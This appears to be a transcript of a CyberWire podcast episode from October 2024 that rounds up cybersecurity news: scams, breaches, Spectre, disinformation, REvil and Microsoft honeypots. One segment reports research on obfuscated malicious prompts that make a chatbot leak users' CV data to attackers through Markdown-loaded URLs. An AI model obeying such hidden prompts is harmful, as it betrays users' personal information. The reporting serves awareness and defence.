On the run, caught on arrival.

An alleged Australian scammer wanted by the FBI gets nabbed in Italy. The Internet Archive has been breached again. Researchers discover vulnerabilities in encrypted cloud storage platforms. Cisco confirms stolen files but insists it’s not a data breach. A Chinese disinformation group targets Senator Marco Rubio. Malicious chatbot prompts can hide inside harmless ones. The DoD wants to offer senior cyber executives part-time roles as military reservists. Six years out, the specter of Spectre remains. Russian prosecutors seek prison for REvil operators. Guest Pete Newell, Founder and CEO of BMNT, talks with N2K's Brandon Karpf about challenges associated with technology adoption and change in the DoD. Microsoft uses clever deception to reel in phishers. 

Today is Monday October 21st 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

An alleged Australian scammer wanted by the FBI gets nabbed in Italy. 

An Australian man, wanted by the FBI for a $46 million online scam, was arrested in Milan, Italy. This 44-year-old, described by authorities as an “Italo-Australian,” had been dodging law enforcement for over three years. Interpol tipped off Italian border police, who nabbed him at Malpensa Airport as he got off a flight from Singapore. The scam itself? Classic tech support fraud, but with a nasty twist. Victims—mostly elderly folks—were duped into thinking their computers were compromised. A fake error message popped up, telling them to call for help. Once on the line, they were convinced to fork over money for “technical assistance” that, surprise, didn’t exist. The FBI’s investigation estimated the gang’s ill-gotten gains at around $31 million. Authorities are now working on extraditing the suspect to the U.S., where he’ll face justice for his part in this global scheme.

The Internet Archive has been breached again. 

The Internet Archive has been breached again, this time through their Zendesk email support platform. The hacker, who had warned the Archive weeks earlier about exposed GitLab authentication tokens, accessed over 800,000 support tickets, including requests for site removals from the Wayback Machine. Victims may have shared personal identification in those tickets, which the hacker could now access. This comes after a previous breach where 33 million users’ data was stolen through the same GitLab token, which had been exposed for nearly two years. Despite repeated warnings from security researchers, the Internet Archive failed to rotate many of the compromised API keys. The hacker claims they stole 7TB of data, although no proof was provided. The breach wasn’t politically motivated or financially driven but was carried out for “cyber street cred,” boosting the hacker’s reputation among others in the data breach community. 

Researchers discover vulnerabilities in encrypted cloud storage platforms. 

Researchers from ETH Zurich have discovered security vulnerabilities in several end-to-end encrypted (E2EE) cloud storage platforms, including Sync, pCloud, Icedrive, Seafile, and Tresorit, which together serve over 22 million users. The research highlights flaws that could allow attackers, especially those controlling malicious servers, to access, modify, or inject files into users’ storage. These issues undermine the platforms’ claims of complete data protection.

The vulnerabilities varied by platform. Sync had issues with key material and file tampering, while pCloud and Icedrive also struggled with unauthorized key manipulation. Seafile was vulnerable to password brute-forcing, and Tresorit, though faring better, still had weaknesses in key authentication.

Despite notifying the companies, not all have responded promptly. Sync claims to be addressing the flaws, while Icedrive has opted not to fix them. This research serves as a reminder that even encrypted platforms aren’t foolproof and highlights the importance of staying vigilant with cloud storage security.

Cisco confirms stolen files but insists it’s not a data breach.  

Cisco confirmed that some of its files were stolen after a hacker, known as IntelBroker, offered company data for sale on a cybercrime forum. On October 14, IntelBroker claimed to have accessed various sensitive assets, including source code, credentials, API tokens, and documents from companies like Microsoft, AT&T, and Verizon. The hacker also shared screenshots to back up these claims. Cisco launched an investigation and stated that, as of now, its systems were not breached. The stolen data came from a public-facing DevHub environment, a resource center for customers. Cisco noted that some files not meant for public download were exposed, but no sensitive personal or financial information was detected so far. In response, Cisco has disabled access to the affected site and continues to investigate. IntelBroker has a history of targeting major companies, though the impact of this breach may be limited.

A Chinese disinformation group targets Senator Marco Rubio. 

Chinese disinformation group Spamouflage has renewed its attacks on Republican Senator Marco Rubio of Florida, according to researchers at Clemson University’s Media Forensics Lab. The group first targeted Rubio during his 2022 re-election campaign, flooding social media with pro-Rubio posts to drown out legitimate content. But in mid-September 2024, Spamouflage returned, testing new tactics with more sophisticated anti-Rubio messaging.

Researchers believe Rubio is a “canary in the coal mine,” and China may be using these new techniques for future campaigns. The posts, shared on platforms like X (formerly Twitter), Reddit, and Medium, appear more authentic, using hijacked accounts and possibly AI-generated content.

Senator Rubio, a vocal critic of China, did not directly address the campaign but warned that China is becoming more aggressive in its efforts to shape American opinion. Experts caution that we shouldn’t underestimate China’s disinformation efforts, as they become more refined and dangerous.

Malicious chatbot prompts can hide inside harmless ones. 

Security researchers have found a way to use AI chatbots for sneaky attacks that could expose personal details. They developed an algorithm that hides malicious prompts inside seemingly harmless ones, tricking users into sharing sensitive information, like their CV data, with attackers. The researchers uploaded CVs into chatbot conversations, and the bot sent back the personal information in the file.

Earlence Fernandes from UC San Diego, who worked on the research, compared the attack to malware. What’s fascinating here is that the malicious behavior can be triggered by a short, gibberish-like prompt without raising the user’s suspicions.

In response, Mistral AI quickly patched the vulnerability, stopping the chatbot from loading external URLs via Markdown syntax. Fernandes believes this may be one of the first times an adversarial prompt led to an actual fix.

Experts advise users to be cautious about what personal data they share with AI bots and to avoid using unverified prompts from the internet.

The DoD wants to offer senior cyber executives part-time roles as military reservists.

The U.S. Defense Department is looking to tap into Silicon Valley’s tech talent by offering senior executives part-time roles as military reservists. These tech pros, like chief technology officers, would serve in high-ranking positions and be called in for short-term projects in areas like cybersecurity and data analytics. Brynt Parmeter, the Defense Department’s chief talent management officer, is spearheading the effort, aiming to bring dozens of tech professionals on board by next September, with plans to grow the program significantly over the next few years.

This initiative marks a shift in Silicon Valley’s relationship with the military, as tech companies increasingly see national security opportunities as beneficial. Parmeter hopes to place these tech experts in roles equivalent to major or lieutenant colonel in the Army and Air Force Reserves. The goal is to strengthen the military’s capabilities by leveraging private-sector expertise, without pulling these tech pros away from their keyboards and into combat.

Six years out, the specter of Spectre remains. 

Six years after the Spectre processor design flaws were first revealed, researchers are still finding vulnerabilities. Johannes Wikner and Kaveh Razavi from ETH Zurich uncovered a new cross-process Spectre attack that bypasses security defenses like Address Space Layout Randomization (ASLR) on recent Intel processors. This attack allows hackers to leak sensitive data, such as root password hashes.

Spectre attacks exploit speculative execution, a performance feature in modern CPUs, to access out-of-bounds memory, revealing secrets like passwords. Despite Intel’s microcode patch (INTEL-SA-00982) in March 2024, vulnerabilities remain in Intel’s 12th to 14th-gen Core processors and 5th and 6th-gen Xeon chips. AMD Zen 1 and Zen 2 processors are also affected, with Linux users at risk.

Russian prosecutors seek prison for REvil operators. 

Russian prosecutors are seeking prison sentences of up to 6.5 years for four individuals linked to the notorious hacking group REvil. The group, responsible for major ransomware attacks, was shut down in 2021, with 14 members arrested by Russian authorities. While 14 were detained, only eight have faced charges related to illegal financial transactions in a Moscow court. The defense argues that prosecutors have yet to provide concrete evidence.

Key suspects, including alleged leader Daniil Puzyrevsky, face additional charges for unauthorized access to computer information. REvil became infamous for targeting high-profile individuals and companies, such as Lady Gaga and the U.S. software provider Kaseya. Notably, Russia’s crackdown on REvil followed U.S. pressure, with President Biden urging action against cybercriminals affecting American businesses. During the arrests, authorities seized millions in cash, cryptocurrency, and luxury items from the suspects.

 

Coming up, we’ve got BMNT Founder and CEO Pete Newell andN2K's Brandon Karpf discussing the challenges associated with technology adoption and change in the DoD.

We’ll be right back.

Welcome back.

Microsoft uses clever deception to reel in phishers. 

And finally, Microsoft is getting clever with phishing attackers, using a bit of “spy-vs-spy” deception to throw them off their game. At the BSides Exeter conference, Ross Bevington, who dubs himself Microsoft’s “Head of Deception,” revealed how the tech giant lures cybercriminals into fake environments designed to look like real Azure tenants. These honeypots, filled with fake user accounts, emails, and activity, trick attackers into thinking they’ve struck gold—when in reality, they’re just playing in Microsoft’s sandbox.

Once the bad guys log in using phishing kits or stolen credentials, Microsoft tracks their every move. It’s like handing them the keys to a mansion, only to let them wander aimlessly while you watch from the security cameras. In 5% of cases, the attackers fall for it, wasting days hunting for sensitive data that doesn’t exist. Meanwhile, Microsoft collects valuable intel—IP addresses, phishing methods, and behavior patterns.

Bevington’s team is fighting phishing at scale, with Microsoft monitoring about 25,000 phishing sites daily. For around 20% of these sites, they feed in honeypot credentials, and for the unlucky hackers who take the bait, Microsoft starts logging everything.

And they don’t stop there—they slow the entire experience down, dragging out the attackers’ time in the fake environment for up to 30 days. The result? Attackers waste time, Microsoft gains crucial intelligence, and security teams around the world get better defenses. It’s a win-win… well, unless you’re the hacker.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

 

This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.